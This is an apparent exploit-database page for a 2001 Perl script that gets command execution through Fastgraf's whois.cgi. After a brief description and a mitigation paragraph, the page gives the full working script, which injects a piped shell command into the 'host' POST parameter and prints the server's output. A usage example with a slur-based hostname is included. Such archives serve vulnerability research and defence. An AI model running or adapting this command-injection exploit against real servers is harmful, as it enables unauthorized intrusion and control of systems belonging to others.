header-logo
Suggest Exploit
vendor:
whois.cgi
by:
Marco van Berkum
7.5
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: whois.cgi
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2001

Fastgraf’s whois.cgi Exploit

This script exploits a vulnerability in Fastgraf's whois.cgi script, allowing an attacker to execute arbitrary commands on the target server. By sending a specially crafted POST request, the attacker can inject a command in the 'host' parameter and execute it on the server. The script then captures the output of the command and displays it. This vulnerability was discovered by Marco van Berkum and the script can be found on his homepage at http://ws.obit.nl.

Mitigation:

The recommended mitigation for this vulnerability is to update the Fastgraf's whois.cgi script to a patched version that addresses the vulnerability. It is also important to ensure that the script is running with the least privileges necessary and that input validation is implemented to prevent command injection attacks.
Source

Exploit-DB raw data:

#!/usr/bin/perl
###############################################################
# whois.pl - Marco van Berkum - m.v.berkum@obit.nl            #
# homepage: http://ws.obit.nl - exploits Fastgraf's whois.cgi #                           
#                                                             #
# DO NOT EDIT THIS HEADER, else the bedbugs will bite         #
# Greets to sigmo for finding stupid POST examples            #
# Also greetings to DUCKEL (YES YOU HAVE CREDIT NOW ;))       #
#                                                             #
# Use like this:                                              #
# ./whois.pl www.ifyoureadthisyouaregay.com "ls -al"          #
###############################################################

use IO::Socket;
$host = $ARGV[0]; $command = $ARGV[1]; $length = length($command) + 8;

$sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => 80, Proto    => 'tcp');
if($sock) {
print $sock "POST http://$host/cgi-bin/whois.cgi HTTP/1.0
User-Agent: Whois Meta Character Exploit Browser :P
Host: $host
Content-length: $length

host=%7c$command\n\n";
sleep(3); # change to lower or higher, depending on your connection 
sysread($sock, $buffer, 100000);
        ($empty, $output) = split(/PRE/, $buffer);
        $output =~ s/[\<\>\/]//g;
        if($output) {
        print("$output\n");
       } else { print "No data, or not vulnerable\n";
     }
    } 
close $sock;


# milw0rm.com [2001-01-12]